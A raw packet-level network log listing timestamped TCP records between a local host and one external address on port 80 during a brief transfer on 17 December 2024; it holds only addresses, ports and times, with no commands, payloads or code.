Dec 17, 2024 06:03:23.352312088 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.352374077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.353302002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.353399038 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.353404999 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.353457928 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.354422092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.354536057 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.354562998 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.354695082 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.355544090 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.355633020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.355710030 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.355915070 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.356640100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.356698990 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.356766939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.356839895 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.357775927 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.357836962 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.357878923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.358020067 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.358875036 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.358949900 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.358952045 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.359112978 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.360028982 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.360129118 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.360136032 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.360249043 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.361119986 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.361244917 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.361248016 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.361336946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.362231970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.362306118 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.362373114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.362426996 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.363435984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.363521099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.363531113 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.363687992 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.364447117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.364538908 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.364592075 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.364592075 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.365566015 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.365653992 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.365662098 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.365724087 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.366667032 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.366758108 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.366786003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.366884947 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.367773056 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.367839098 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.367882967 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.367961884 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.368896008 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.369005919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.369028091 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.369050026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.370049953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.370114088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.370135069 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.370186090 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.371131897 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.371192932 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.371247053 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.371365070 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.372240067 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.372343063 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.372399092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.372509003 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.373342037 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.373420954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.373441935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.373469114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.374459028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.374568939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.374653101 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.374653101 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.375561953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.375622988 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.375679970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.375754118 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.376786947 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.376862049 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.376867056 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.376961946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.377829075 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.377885103 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.377935886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.378056049 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.378942966 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.378987074 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.379065037 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.379115105 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.380031109 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.380147934 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.380187988 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.380187988 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.381162882 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.381206036 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.381258965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.381304979 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.382258892 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.382323027 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.382365942 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.382411003 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.383403063 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.383496046 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.383510113 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.383667946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.384484053 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.384563923 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.384605885 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.384742975 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.385592937 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.385674000 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.385710955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.385823011 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.386729002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.386826038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.386845112 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.386924028 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.387818098 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.387890100 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.387938023 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.388026953 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.388991117 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.389069080 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.389077902 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.389130116 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.390079021 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.390182972 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.390191078 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.390285969 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.391187906 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.391263008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.391320944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.391371965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.392282009 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.392364025 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.392404079 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.392560959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.393390894 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.393465996 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.393518925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.393764019 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.394501925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.394567013 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.394670010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.394721031 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.395607948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.395668983 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.395709991 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.395811081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.396775961 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.396873951 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.396915913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.396982908 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.397814035 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.397937059 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.398128033 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.398240089 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.398252010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.398302078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.399307013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.399357080 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.399502039 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.399568081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.400362015 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.400418043 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.400469065 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.400553942 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.401467085 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.401536942 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.401587963 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.401660919 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.402618885 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.402743101 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.402755976 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.402802944 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.403769970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.403805017 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.403831959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.403876066 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.404839993 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.404905081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.404942036 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.404992104 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.405930042 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.406008959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.406053066 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.406275034 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.407041073 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.407131910 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.407140970 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.407341003 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.541539907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.541605949 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.541609049 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.541675091 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.542052031 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.542083025 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.542151928 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.542151928 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.543198109 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.543287039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.543368101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.543412924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.544275045 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.544342995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.544385910 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.544454098 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.545386076 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.545485020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.545536995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.545646906 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.546565056 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.546614885 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.546638012 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.546680927 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.547627926 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.547712088 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.547785044 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.547877073 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.548731089 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.548796892 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.548844099 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.548883915 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.549845934 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.549959898 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.549968958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.550007105 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.550971985 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.551099062 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.551145077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.551145077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.552088022 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.552200079 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.552239895 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.552412033 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.553212881 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.553262949 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.553313971 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.553457975 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.554313898 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.554389954 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.554464102 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.554538965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.555476904 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.555577993 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.555605888 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.555622101 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.556539059 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.556663990 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.556679964 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.556729078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.557635069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.557737112 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.557751894 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.557811022 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.558773041 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.558855057 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.558897018 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.558945894 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.559885979 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.559953928 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.560009003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.560108900 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.561006069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.561113119 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.561132908 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.561218023 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.562076092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.562145948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.562228918 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.562228918 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.563224077 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.563329935 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.563334942 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.563385963 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.564327955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.564393044 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.564460993 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.564532995 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.565448999 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.565512896 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.565563917 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.565613985 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.566551924 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.566639900 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.566669941 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.566800117 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.567677975 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.567734003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.567770958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.567771912 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.568775892 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.568847895 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.568897009 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.568962097 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.569868088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.569974899 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.569994926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.570038080 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.571002007 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.571151972 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.571191072 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.571276903 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.572132111 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.572215080 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.572230101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.572290897 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.573230982 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.573358059 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.573364973 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.573467016 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.574332952 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.574436903 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.574490070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.574542999 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.575448990 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.575514078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.575547934 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.575628042 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.576560020 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.576670885 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.576685905 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.576992035 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.577666998 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.577733994 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.577786922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.577845097 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.578805923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.578834057 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:23.578870058 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:23.578912973 CET	49850	80	192.168.2.5	31.41.244.11
